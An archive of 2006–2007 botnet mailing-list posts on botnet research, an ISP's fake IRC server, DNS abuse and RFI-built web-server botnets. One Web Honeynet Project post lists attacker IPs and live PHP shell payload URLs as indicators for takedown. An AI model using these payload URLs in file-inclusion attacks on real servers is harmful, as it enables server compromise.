To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 26 Jul 2007, Craig Holmes wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- As promised, I bought the book and finally received it (thanks for the slow turn around Amazon). I have begun reading it, and although I am only starting the third chapter I am wholly unimpressed. Before I discuss the text of the book, I am curious to know. Is it a print problem or do many of the graphics in the book look overly blurry or excessively jagged? Some of the pictures look like they were compressed to a monochrome bitmap of about 2k in size (see page 47). My experience with botnets seem to differ in many ways from the text in the book: The book begins by describing what SDBot, Agobot, GTBot, etc do. They include lists of ports and vulnerabilities that the given bot exploits, actions it may perform etc. The book doesn't make the point strong enough that a lot of code (especially SDBot code) started off as simply a public offering and evolved through many different trees by people with no organization. These trees criss-crossed without any knowledge of many of the contributors. In fact, as I recall SDBot (at least a couple of versions from sd) was released to the public without a single attack vector. It is my belief that this version is responsible for the most variants due to it's availability. The book seems to be making a point that bots are being used by organized crime. I think this point has been pushed on my fronts of this issue by many people, however I remain doubtful. In my experience with farmers (or bot herders as the book calls them) is that they're packet kiddies out to DoS their moronic buddies or enemies. The botnet was just a natural evaluation from Trinoo/TFN/Trinity/Kaiten or if they're even lamer then Backorifice, etc. Though I do certainly accept that some lone individuals use botnets for monitary gain (avert scams), I wouldn't classify it as organized. Look at the numbers given in the book: -4.5 Million active botnet computers -A small botnet is 10,000 computers That means that there are about 500 botnets active. The book states only a handful of cases that involved organized crime, possibly 5 cases. That means that they've identified at least 0.01% of the 500 botnets are being run by the big evil organized crime people. Not to say that proves them wrong, but it isn't enough evidence for me. I believe they are sensationalizing this fact quite a bit. The book paints a pretty diagram showing how people with their cam corders run from the movie theatre directly to their dorm and upload their bootlegs to topsites which are actually botnets. This is a silly notion. A great deal movies that are available on the internet today (and much software) are released by organized (though not by for profit) piracy groups (the 'scene'). These groups do use topsites, but they are FTP servers running on legitmate hardware (a member of the group may be a sysadmin at MIT for example). These topsites and groups are not even remotely affiliated with botnets (or at least weren't in 2002 which is when my experience dates to). The offenders identified (from Drink or Die, Razor1911, etc) wouldn't be caught dead touching a botnet, as it would do great damage to their reputation. Furthermore, these elite groups have very little use for clickthrough scams, distributed storage, or dos attacks. I feel like the authors are making a far too liberal attempt at connecting the dots on many issues. I am also slightly disappointed as it seemed much of the book will be focused on general intrusion detection techniques, sandboxing, reporting etc and less on practical cases, motivation, CC methods, encryption and more technical aspects of the bot itself. I will report my final thoughts when I complete the book. Craig Got any comments on the third chapter? On Sunday 08 July 2007 21:53, Thomas Raef wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Gadi, It's easier for people to just buy the book. I bought it about a month ago and have read it a few time already. Nice work! ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] [Dshield] ISP redirecting IRC traffic to attempt bot removal (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -- Forwarded message -- Date: Fri, 20 Jul 2007 06:11:25 -0400 From: jayjwa [EMAIL PROTECTED] Reply-To: General DShield Discussion List [EMAIL PROTECTED] To: Dshield Mail List [EMAIL PROTECTED] Subject: [Dshield] ISP redirecting IRC traffic to attempt bot removal When blocking goes to far, part #2 (working title: First they came for email, now it's IRC) Background info: 1) http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/55016 2) The typical command for rbot/urxbot removal of the bot from the bot user's perspective is to issue a command such as /msg bot .remove, sometimes also ! is the command prefix, but technically it can be anything. They seem to forgotten most bots require .login before accepting commands, but there may be some that do not. 3) The code for the server appears altered as well, as it announces multiple, different topics. Normally IRC servers do not do this for the same channel. Fri Jul 20 05:57:00 EDT 2007: *** Performing DNS lookup for [70.168.70.4] (server 4) *** DNS lookup for server 4 [70.168.70.4] returned (1) addresses *** Connecting to server refnum 4 (70.168.70.4), using address 1 (70.168.70. +4:6667) *** Looking up your hostname... *** Checking Ident *** No Ident response (They lie, I do most certainly run Identd) *** Welcome to the Internet Relay Network jayjwa *** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2 *** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2 *** This server was created Thu Dec 6 2001 at 11:52:49 EST *** localhost.localdomain 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve *** There are 2 users and 0 invisible on 1 servers *** I have 2 clients and 0 servers *** Current local users: 2 Max: 2 *** Current global users: 2 Max: 2 *** Highest connection count: 2 (2 clients) (2 since server was (re)started) *** - localhost.localdomain Message of the Day - *** - Where's the kaboom? There was supposed to be an earth shattering kaboom. + *** End of /MOTD command. *** jayjwa ([EMAIL PROTECTED]) has joined channel #martian_ *** Mode change +nt on channel #martian_ by localhost.localdomain *** Users on #martian_: @Marvin_ jayjwa *** Topic for #martian_: .bot.remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: .remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: .uninstall *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: !bot.remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: !remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: !uninstall *** The topic was set by Marvin_ 3 sec ago Marvin_ .bot.remove Marvin_ .remove Marvin_ .uninstall Marvin_ !bot.remove Marvin_ !remove Marvin_ !uninstall *** Mode for channel #martian_ is +tn *** Channel #martian_ was created at Fri Jul 20 05:46:57 2007 User [EMAIL PROTECTED] was not on the names list for channel +[#martian_] on server [4] -- adding them 05:51AM [1] jayjwa #martian_ (+nt) (Mail: 56) EPIC5 -- Type /help for help EPic To sum this up for those not familiar with IRC, if I was a client of this ISP, and I tried to access the public IRC network irc.ablenet.org, my ISP's nameserver would return knowningly false information to send me to this fake server, which, once there, auto-logs me into a channel and attempts to interact with software I may or may not have running on my machine in an attempt to remove it from my machine. -- [RBL:Just A Bad Idea] Do not use DNS-RBL; Demand your ISP stop. Tell RoadRunner/Adelphia, Netzero,etc: don't trash your mail. http://www.ifn.net/classic/rblstory.htm http://theory.whirlycott.com/~phil/antispam/rbl-bad/rbl-bad.html _ SANSFIRE 2007 July 25-August 2 in Washington, DC. 56 courses, SANS top instructors, and a great tools and solutions expo. Register today! http://www.sans.org/info/4651 (brochure code ISC) ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Alternative Botnet CCs - free chapter from Botnets: The Killer Web App
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sun, 8 Jul 2007, Gadi Evron wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Syngress was kind enough to allow me to post the chapter I wrote for Botnets: The Killer Web Application (http://www.syngress.com/catalog/?pid=4270) on my blog at SecuriTeam as a free sample. It is the third chapter in the book, and requires some prior knowledge of what a botnet CC (command and control) is. It is basic, short, and to my belief covers quite a bit. It had to be short, as I had just 5 days to write it while doing other things, and not planning on any writing, but it is pretty good in my completely unbiased opinion. ;) For the chapter: http://blogs.securiteam.com/index.php/archives/953 Direct link: http://www.beyondsecurity.com/whitepapers/005_427_Botnet_03.pdfB Erm.. http://www.beyondsecurity.com/whitepapers/005_427_Botnet_03.pdf For the full book, you would need to spend the casAh: http://www.syngress.com/catalog/?pid=4270 Enjoy! Gadi Evron. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] active Bandook site
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- We are on it. On Thu, 12 Apr 2007, PinkFreud wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] [funsec] Widespread vandalism of wikis by some type of bot (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -- Forwarded message -- Date: Wed, 11 Apr 2007 02:32:46 -0500 From: Reed Loden [EMAIL PROTECTED] To: funsec@linuxbox.org Subject: [funsec] Widespread vandalism of wikis by some type of bot I'm seeing _lots_ of wikis vandalized by bots today (Tuesday/Wednesday), and I was wondering if anybody else had noticed this and/or had any more information on what is happening. The wikis I've seen this on all run MediaWiki, so I'm unsure if it affecting only MediaWiki-based wikis or if it extends to others. Also, the bots only seem to be able to attack a wiki if e-mail registration is not required. The bots create accounts and use the accounts for the vandalism, but if e-mail confirmation is set to on, it seems to stop them. Another thing that seems to stop them is a captcha. As far as actions taken by the bots, I've seen HTML that was encoded be decoded, blank lines deleted, and content completely removed. The last one in the list scares me the most, as the bots just eat away at the content on the wiki. All changes they make are marked as minor and each account only seems to make one change before moving on (or registering a new account?). All the bots seem to have the same type of random account names that seems only to be alphanumeric, contain six characters, and have the first and fourth character be uppercase. Some examples that I found on one of the wikis include: VtjX6p, OcmFis, Gb5Jab, Pm2O0t, SvhYc0, QusUdr, LiiRq5, etc. I'm not sure if this is some type of new virus/trojan infecting users and then vandalizing wikis, but they are definitely coming from multiple IPs. I'm interested in knowing if the IPs are all from a specific area or if they are spread out over various ISPs. Also, I would like to know how the bots are finding the wikis to vandalize. If they are using a specific query on a search engine, the respective search engine might could help stop this madness. If anybody has any information about these bots, please let me know. Thanks, ~reed -- Reed Loden - [EMAIL PROTECTED] ___ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] On-going Internet Emergency and Domain Names
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- There is a current on-going Internet emergency: a critical 0day vulnerability currently exploited in the wild threatens numerous desktop systems which are being compromised and turned into bots, and the domain names hosting it are a significant part of the reason why this attack has not yet been mitigated. This incident is currenly being handled by several operational groups. This past February, I sent an email to the Reg-Ops (Registrar Operations) mailing list. The email, which is quoted below, states how DNS abuse (not the DNS infrastructure) is the biggest unmitigated current vulnerability in day-to-day Internet security operations, not to mention abuse. While we argue about this or that TLD, there are operational issues of the highest importance that are not being addressed. The following is my original email message, elaborating on these above statements. Please note this was indeed just an email message, sent among friends. - Begin quoted message - Date: Fri, 16 Feb 2007 02:32:46 -0600 (CST) From: Gadi Evron To: [EMAIL PROTECTED] Subject: [reg-ops] Internet security and domain names Hi all, this is a tiny bit long. Please have patience, this is important. On this list (which we maintain as low-traffic) you guys (the registrars) have shown a lot of care and have become, on our sister mitigation and research lists (those of you who are subscribed), an integral part of our community we now call The Internet Security Operations Community. We face problems today though, that you can not help us solve under the current setting. But only you can help us coming up with new ideas. Day-to-day, we are able to report hundreds and thousands of completely bogus phishing and other bad domains, but both policy-wise and resources-wise, registrars can't handle this. I don't blame you. In emergencies, we can only mitigate threats if one of you or yours are in control.. Just a week ago we faced the problem of the Dolphins stadium being hacked and malicious code being put on it: 1. We tracked down all the IP addresses involved and mitigated them (by we I mean also people other than me. Many were involved). 2. We helped the Dolphins Stadium IT staff take care of the malicious code on their web page - Specifically Gary Warner). 3. We coordinated with law enforcement. 4. We coordinated that no one does a press release which will hurt law enforcement. 5. We did a lot more. Including actually convincing a Chinese registrar to pull one of the domains in question. A miracle. There was another domain to be mitigated, unsuccessfully. One thing though - at a second's notice, this could all be for nothing as the DNS records could be updated with new IP addresses. There were hundreds of other sites also infected. Even if we could find the name server admin, some of these domains have as many as 40 NSs. That doesn't make life easy. Then, these could change, too. This is the weakest link online today in Internet security, which we in most cases can't mitigate, and the only mitigation route is the domain name. Every day we see two types of fast-flux attacks: 1. Those that keep changing A records by using a very low TTL. 2. Those that keep changing NS records, pretty much the same. Now, if we have a domain which can be mitigated to solve such emergencies and one of you happen to run it, that's great... However, if we end up with a domain not under the care of you and yours.. we are simply.. fucked. Sorry for the language. ICANN has a lot of policy issues as well, and the good guys there can't help. ICANN has enough trouble taking care of all those who want money for .com, .net or .xxx. All that being said, the current situation can not go on. We can no longer ignore it nor are current measures sufficient. It is imperative that we find some solutions, as limited as they may be. We need to be able to get rid of domain names, at the very least during real emergencies. I am aware how it isn't always easy to distinguish what is good and what is bad. Still, we need to find a way. Members of reg-ops: What do you think can be conceivably done? How can we make a difference which is REALLY needed on today's Internet? Please participate and let me know what you think, we simply can no longer wait for some magical change to happen. Gadi. - End of quoted message - Thousands of malicious domain names and several weeks later, we face the current crisis. The 0day vulnerability is exploited in the wild, and mitigating the IP addresses is not enough. We need to be able to get rid of malicious domain names. We need to be able to mitigate attacks on the weakest link - DNS, which are not necessarily solved by DNS-SEC or Anycast. On Reg-Ops and other operational groups, we came up with some imperfect ideas on what we can make happen on our own in short term which will help us reach better mitigation, as security does not seem
Re: [botnets] Web Server Botnets and Server Farms as Attack
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sat, 17 Feb 2007, Tom wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- First, I would like to apologize to all for these multiple copies of my post. No one, including myself, wants to see multiple copies of a post. When I replied to Gadi's email I replied to all. Somehow this caused a list loop creating multiple copies. In the future, I will reply solely to this list as I have for this post in the hopes that that will stop the duplicate mail problem. However, I would ask the list moms' to look into the issue. Just happens with SF lists are CC:'d. Tom ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] defacements for the installation of malcode
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 14 Feb 2007, Jeremy Epstein wrote: There was also a really entertaining presentation from Patrick Petersen of IronPort at RSA, in which he mentioned use of defaced web sites as proxy forwarders for spammers. According to the presentation, the spammers have a fairly sophisticated toolkit that takes over the site and turns it into a pharmacy (or whatever) redirect site. A different goal from the Websense presentation, but still a purpose other than simple defacement. Indeed. I can post some screenshots of some of these tools if you are interested in them. Anon remailers, spam tools, etc. More and more spam is being sent using web servers. I am looking for someone to volunteer to create spam assasin rules based on how these tools send mail. You can find my writeup and link to article on this subject here: http://blogs.securiteam.com/index.php/archives/815 Gadi. --Jeremy -Original Message- From: Gadi Evron [mailto:[EMAIL PROTECTED] Sent: Monday, February 12, 2007 11:17 AM To: [EMAIL PROTECTED] Cc: botnets@whitestar.linuxbox.org; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: defacements for the installation of malcode Websense just released a blog post on how sites get defaced for malicious purposes other than the defacement itself, such as installing mallicious software on visiting users. This is yet another layer of abuse of web server attack platforms. You can find their post here: http://www.websense.com/securitylabs/blog/blog.php?BlogID=109 Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Storm Worm DDoS Attack - Research - SecureWorks
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- http://www.secureworks.com/research/threats/view.html?threat=storm-worm Interesting article about the anatomy of the Storm Worm malware. The article also mentions that they believe the SpamHaus DDoS attack was simply collateral damage between multiple warring botnet operators. (Greetings to Joel Leach) ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Web Server Botnets and Server Farms as Attack Platforms
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Are file inclusion vulnerabilitiess equivalent to remote code execution? Are servers (both Linux and Windows) now the lower hanging fruit rather than desktop systems? In the February edition of the Virus Bulletin magazine, we (Kfir Damari, Noam Rathaus and Gadi Evron (me) of Beyond Security) wrote an article on cross platform web server malware and their massive use as botnets, spam bots and generally as attack platforms. Web security papers deal mostly with secure coding and application security. In this paper we describe how these are taken to the next level with live attacks and operational problems service providers deal with daily. We discuss how these attacks work using (mainly) file inclusion vulnerabilities (RFI) and (mainly) PHP shells. Further, we discuss how ISPs and hosting farms suffer tremendously from this, and what can be done to combat the threat. I'd like to write more on this here, and ask for the community's feedback on what others see in this field and how you deal with similar issues. Malware is often built to operate within a certain OS environment. Web server malware is completely cross-platform (as long as a web daemon which supports scripting can be found such as IIS, Apache, etc.). These malware attack the web application first, and only then further compromise takes place platform by platform, using the web server's privileges. Most web servers are being compromised by these attacks as a result of an insecure web application written in PHP, although attacks for other scripting languages such as Perl and ASP are also in-the-wild. The main reason for this is that many different PHP applications are available online, and often freely as open source, which makes them a popular selection for use on many web sites. Another reason for the popularity of attacks against PHP applications is that writing securely in PHP is very difficult, which makes most of these PHP applications vulnerable to multiple attacks, with hundreds of new vulnerabilities released publicly every month. While in the past botnets used to be composed of mainly broadband end users running Windows, today we can see more and more server botnets we can refer to as IIS botnets or Linux botnets as a direct result of these attacks. One of the conclusions we reached was that although the technologies used are not new (RFI, PHP shells, etc.) the sheer scale of the problem is what's interesting. In our research as detailed in the Virus Bulletin article we recognize that vulnerabilities such as file inclusion, as simple as they may be, are equivalent to remote code execution in effect. Although escalation wars, which are reactive in nature, are a solution we hate and are stuck with on botnets, spam, fraud and many other fronts, this front of web server attacks stands completely unopposed and controlled by the bad guys. In our research we detail how over-time, when aggregated, most attacks come from the same IP addresses without these ever getting blocked. ISPs and hosting farms selling low-cost hosting services can not cope with this threat, especially where an attack against one user running such an application can compromise a server running 3000 other sites. Another issue discussed was the formation of the Web Honeynet Task Force ( http://www.webhoneynet.net/ renamed from the Web Honeynet Project to avoid confusion with the honeynet project). I write more about this and host the paper on my blog at SecuriTeam ( http://blogs.securiteam.com/index.php/archives/815 ). All rights for the article itself belong to the Virus Bulletin magazine. Gadi Evron. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] defacements for the installation of malcode
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Websense just released a blog post on how sites get defaced for malicious purposes other than the defacement itself, such as installing mallicious software on visiting users. This is yet another layer of abuse of web server attack platforms. You can find their post here: http://www.websense.com/securitylabs/blog/blog.php?BlogID=109 Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Germany, Austria and Swizzerland building biggest botnet ever
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Thread over, FUD elsewhere. Thanks. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Web Honeynet Project: announcement, exploit URLs this Wednesday
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- [ Warning: this email message includes links to live web server malware propagated this Wednesday via file inclusions exploits. These links are not safe! ] Hello. The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will in the next few months announce research on real-world web server attacks which infect web servers with: Tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild. The Web Honeynet Project will, for now, not deal with the regular SQL injection and XSS attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms. These attacks form botnets constructed from web servers (mainly IIS and Apache on Linux and Windows servers) and transform hosting farms/colos to attack platforms. Most of these tools are being injected by (mainly) file inclusion attacks against (mainly) PHP web applications, as is well known and established. PHP (or scripting) shells, etc. have been known for a while, as well as file inclusion (or RFI) attacks, however, mostly as something secondary and not much (if any - save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves. The bad guys currently exploit, create botnets and deface in a massive fashion and force ISPs and colos to combat an impossible situation where any (mainly) PHP application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one. What is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) - meaning aside for research, the Web Honeynet Project will also release actionable data on offensive IP addresses, URLs and on the tools themselves to be made available to operational folks, so that they can mitigate the threat. It's long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. Several folks (and quite loudly - me) have been warning about this for a while, not it's time to take action instead of talk. :) Note: Below you can find sample statistics on some of the Web Honeynet Project information for this last Wednesday, on file inclusion attacks seeding malware. You will likely notice most of these have been taken care of by now. The first research on the subject (after looking into several hundred such tools) will be made public in the February edition of the Virus Bulletin magazine, from: Kfir Damari, Noam Rathaus and Gadi Evron (yours truly). The SecuriTeam and ISOTF Web Honeynet Project would like to thank Beyond Security ( http://www.beyondsecurity.com ) for all the support. Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the new members of the project. For more information on the Web Honeynet Project feel free to contact me. Also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are). Gadi. Sample report and statistics (for Wednesday the 10th of January, 2007): IP | Hit Count | Malware (Count), ... | 195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4), http://m embers.lycos.co.uk/onuhack/injek.txt? (6), http://m embers.lycos.co.uk/onuhack/cmd.do? (2), 69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (1), http://c lubmusic.caucasus.net/administrator/cmd.gif? (4), http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (5), http://t bchat.caucasus.net/cmd.gif? (1), 216.22.3.11 | 8 | http://h eidi.by.ru/cmdi.txt? (7), http://h eidiz.by.ru/cmdi.txt? (1), 62.149.36.116 | 8 | http://w ww.fc-magdeburg.de/jscripts/tiny_mce/plugins/pic.gif?? (3), http://w ww.discoverchimpanzees.org/blog/sendit.jpg?? (2), http://u bk.no-ip.biz/shine.jpg?? (1), http://w ww.sle.br/polvo2/script/ftv3doc.gif?? (1), http://w ww.sle.br/polvo2/css/css.gif?? (1), 85.25.148.178 | 7 | h ttp://213.133.108.122/alex.gif? (1), http://c lubmusic.caucasus.net/Administrator/cmd.gif? (5), http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (1), 69.13.6.170 | 7 | http://c ajem.by.ru/cmd.gif? (3), http://k ama.opensolarisproject.com/phpBB2/files/cmd.gif? (1), http://s upsup.by.ru/cmd.gif? (2), http://w ww.bhlynx.org/htdig/sad.gif? (1), 201.63.179.122 | 7 | http://d arkhand.netfast.org/list.txt??? (2), http://w ww.locman.net/Guide/vkod/list.txt?? (3), http://g odarmy.net/cmd.txt?? (1), http://c hapolin.by.ru/cmds/list.txt? (1), 219.67.171.131 | 7 | http://i ntra/ (7), 193.39.119.174 | 6 | http://w ww.sirmet.it/pronti/cmd.txt?? (1), http://w ww.overclockers.pl/images/r57.gif? (1), http://w ww.rldiseno.com/administrator/components
Re: [botnets] [da] Finding zombies?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Mon, 8 Jan 2007, Sean Zadig wrote: Greetings all, I'm looking for suggestions on innovative ways to find zombie machines on my networks. Right now, we're looking for IRC traffic and doing some checking for connections to CC machines (using Shadowserver and various other CC lists). Do any of you have any recommendations for other methods? So far, I haven't been able to find too much zombie activity, but I have a feeling it's there. We simply have too many machines for there not to be some activity. Hi Sean. :) Before you get too complicated and complex, start by checking netflow information, as well as DNS information. If 15K machines are going to one computer out in the world and it is not CNN, you have a problem. If suddenly most DNS requests are for an not previously seen RR, you have trouble. Thanks, Sean Zadig Sean Zadig Special Agent NASA OIG Computer Crimes Division Goddard Space Flight Center 301.286.8232 PGP Key: 0xE9659D75 ! WARNING ! This email including any attachments is intended only for authorized recipients. Recipients may only forward this information as authorized. This email may contain non-public information that is Law Enforcement Sensitive, Sensitive but Unclassified, or otherwise subject to the Privacy Act and/or legal and other applicable privileges that restrict release without appropriate legal authority and clearance. Accordingly, the use, dissemination, distribution or reproduction of this information to or by unauthorized or unintended recipients, including but not limited to non-NASA recipients, may be unlawful. ___ da mailing list [EMAIL PROTECTED] https://linuxbox.org/cgi-bin/mailman/listinfo/da ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Finding zombies?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Mon, 8 Jan 2007, Sean Zadig wrote: Greetings all, I'm looking for suggestions on innovative ways to find zombie machines on my networks. Right now, we're looking for IRC traffic and doing some checking for connections to CC machines (using Shadowserver and various other CC lists). Do any of you have any recommendations for other methods? So far, I haven't been able to find too much zombie activity, but I have a feeling it's there. We simply have too many machines for there not to be some activity. Hi Sean. :) Before you get too complicated and complex, start by checking netflow information, as well as DNS information. If 15K machines are going to one computer out in the world and it is not CNN, you have a problem. If suddenly most DNS requests are for an not previously seen RR, you have trouble. Thanks, Sean Zadig Sean Zadig Special Agent NASA OIG Computer Crimes Division Goddard Space Flight Center 301.286.8232 PGP Key: 0xE9659D75 ! WARNING ! This email including any attachments is intended only for authorized recipients. Recipients may only forward this information as authorized. This email may contain non-public information that is Law Enforcement Sensitive, Sensitive but Unclassified, or otherwise subject to the Privacy Act and/or legal and other applicable privileges that restrict release without appropriate legal authority and clearance. Accordingly, the use, dissemination, distribution or reproduction of this information to or by unauthorized or unintended recipients, including but not limited to non-NASA recipients, may be unlawful. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] CCC lecture by Georg Wicherski
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Georg (who is a very cool guy who I am proud to have shared beer with along with Thorsten and some other guys at the C-BASE party) gave a lecture at CCC on botnet detection and mitigation. It can be downloaded from here: http://mirror1.kaschwig.net/23C3/botnet-detect-t4s2.wmv Don't be too evil on the mirror, try a different location from: http://events.ccc.de/congress/2006/Streams Good going Georg! Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] drop zones and an intelligence war
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- In this post ( http://www.phenoelit.net/lablog/Irresponsible.sl ), FX describes a drop zone for a phishing/banking trojan horse, and how he got to it. Go FX. I will refrain from commenting on the report he describes from secure works, which I guess is a comment on its own. We had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public). Once with a very large security intelligence company giving drop zone data in a marketing attempt to get more bank clients (hey buddy, why are 400 banks surfing to our drop zone?!?!) Twice with a guy at defcon showing a live drop zone, and the data analysis for it, asking for it to be taken down (it wasn't until a week later during the same lecture at the first ISOI workshop hosted by Cisco). For this guy's defense though, he was sharing information. In a time where nearly no one was aware of drop zones even though they have been happening for years, he shared data which was valuable commercially, openly, and allowed others to clue up on the threats. Did anyone ever consider this is an intelligence source, and take down not being exactly the smartest move? It's enough that the good guys all fight over the same information, and even the most experienced security professionals make mistakes that cost in millions of USD daily, but publishing drop zone IPs publicly? That can only result in a lost intelligence source and the next one being, say, not so available. I believe in public information and the harm of over-secrecy, I am however a very strong believer that some things are secrets for a reason. What can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries. At least we have responsible folks like FX around to take care of things when others screw up. I got tired of being the bad guy calling the king is naked, at least in this case we can blame FX. :) It's an intelligence war people, and it is high time we got our act together. I will raise this subject at the next ISOI workshop hosted by Microsoft ( http://isotf.org/isoi2.html ) and see what bright ideas we come up with. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] [phishing] drop zones and an intelligence war
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sat, 23 Dec 2006, Gadi Evron wrote: In this post ( http://www.phenoelit.net/lablog/Irresponsible.sl ), FX describes a drop zone for a phishing/banking trojan horse, and how he got to it. Go FX. I will refrain from commenting on the report he describes from secure works, which I guess is a comment on its own. Secure Science, typo on my end. We had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public). Once with a very large security intelligence company giving drop zone data in a marketing attempt to get more bank clients (hey buddy, why are 400 banks surfing to our drop zone?!?!) Twice with a guy at defcon showing a live drop zone, and the data analysis for it, asking for it to be taken down (it wasn't until a week later during the same lecture at the first ISOI workshop hosted by Cisco). For this guy's defense though, he was sharing information. In a time where nearly no one was aware of drop zones even though they have been happening for years, he shared data which was valuable commercially, openly, and allowed others to clue up on the threats. Did anyone ever consider this is an intelligence source, and take down not being exactly the smartest move? It's enough that the good guys all fight over the same information, and even the most experienced security professionals make mistakes that cost in millions of USD daily, but publishing drop zone IPs publicly? That can only result in a lost intelligence source and the next one being, say, not so available. I believe in public information and the harm of over-secrecy, I am however a very strong believer that some things are secrets for a reason. What can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries. At least we have responsible folks like FX around to take care of things when others screw up. I got tired of being the bad guy calling the king is naked, at least in this case we can blame FX. :) It's an intelligence war people, and it is high time we got our act together. I will raise this subject at the next ISOI workshop hosted by 